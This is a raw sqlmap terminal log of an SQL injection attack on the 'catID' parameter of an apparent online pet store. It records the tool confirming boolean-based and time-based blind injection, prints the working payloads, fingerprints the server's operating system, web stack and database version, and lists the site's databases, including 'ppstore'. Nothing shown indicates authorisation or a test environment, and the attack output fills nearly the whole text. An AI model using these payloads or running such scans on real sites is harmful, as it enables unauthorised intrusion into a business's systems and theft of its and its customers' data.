https://store.planetpooch.com/products.php?catID=12
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.3.5.151#dev}
|_ -| . [']     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:56:15 /2019-06-01/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[08:56:16] [INFO] testing connection to the target URL
[08:56:16] [INFO] checking if the target is protected by some kind of WAF/IPS
[08:56:17] [INFO] testing if the target URL content is stable
[08:56:17] [INFO] target URL content is stable
[08:56:17] [INFO] testing if GET parameter 'catID' is dynamic
[08:56:17] [INFO] GET parameter 'catID' appears to be dynamic
[08:56:18] [INFO] heuristic (basic) test shows that GET parameter 'catID' might be injectable
[08:56:18] [INFO] testing for SQL injection on GET parameter 'catID'
[08:56:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[08:56:20] [INFO] GET parameter 'catID' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="for")
[08:56:22] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[08:56:23] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[08:56:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[08:56:23] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[08:56:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[08:56:23] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[08:56:23] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[08:56:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:56:24] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:56:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[08:56:24] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[08:56:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[08:56:25] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[08:56:25] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[08:56:25] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[08:56:25] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[08:56:25] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[08:56:26] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[08:56:26] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[08:56:26] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[08:56:26] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[08:56:26] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[08:56:27] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[08:56:27] [INFO] testing 'MySQL inline queries'
[08:56:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[08:56:27] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:56:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[08:56:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[08:56:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[08:56:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[08:56:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[08:56:49] [INFO] GET parameter 'catID' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[08:56:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:56:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[08:56:52] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[08:56:56] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[08:57:00] [INFO] testing 'Generic UNION query (random number) - 21 to 40 columns'
[08:57:03] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns'
[08:57:07] [INFO] testing 'Generic UNION query (random number) - 41 to 60 columns'
[08:57:10] [INFO] testing 'Generic UNION query (NULL) - 61 to 80 columns'
[08:57:14] [INFO] testing 'Generic UNION query (random number) - 61 to 80 columns'
[08:57:18] [INFO] testing 'Generic UNION query (NULL) - 81 to 100 columns'
[08:57:21] [INFO] testing 'Generic UNION query (random number) - 81 to 100 columns'
[08:57:25] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:57:29] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[08:57:32] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[08:57:36] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[08:57:40] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[08:57:43] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[08:57:47] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[08:57:50] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[08:57:54] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[08:57:58] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[08:58:01] [INFO] checking if the injection point on GET parameter 'catID' is a false positive
GET parameter 'catID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 487 HTTP(s) requests:
---
Parameter: catID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catID=12 AND 4911=4911

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: catID=12 AND (SELECT 6409 FROM (SELECT(SLEEP(5)))EhPp)
---
[08:58:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 7-1708
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL >= 5.0.12
[08:58:06] [INFO] fetching database names
[08:58:06] [INFO] fetching number of databases
[08:58:06] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:58:06] [INFO] retrieved: 2
[08:58:07] [INFO] retrieved: information_schema
[08:58:28] [INFO] retrieved: ppstore
available databases [2]:
[*] information_schema
[*] ppstore

[08:58:36] [INFO] fetched data logged to text files under '/root/.sqlmap/output/store.planetpooch.com'

[*] ending @ 08:58:36 /2019-06-01/

